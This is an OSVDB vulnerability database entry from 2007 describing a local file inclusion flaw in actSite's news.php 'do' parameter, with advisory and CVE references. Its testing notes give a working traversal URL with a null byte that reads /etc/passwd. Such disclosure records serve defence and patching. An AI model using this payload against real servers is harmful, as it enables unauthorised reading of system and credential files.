actSite /phpinc/news.php do Variable Traversal Local File Inclusion

2007-10-01T12:21:02
ID OSVDB:37401
Type osvdb
Reporter OSVDB
Modified 2007-10-01T12:21:02

Description

Manual Testing Notes

http://[target]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00

References:

Vendor Specific News/Changelog Entry: http://actsite.de/index.php/sicherheitsupdate.html Secunia Advisory ID:26999 Other Advisory URL: http://milw0rm.com/exploits/4472 ISS X-Force ID: 36870 FrSIRT Advisory: ADV-2007-3317 CVE-2007-5174 Bugtraq ID: 25869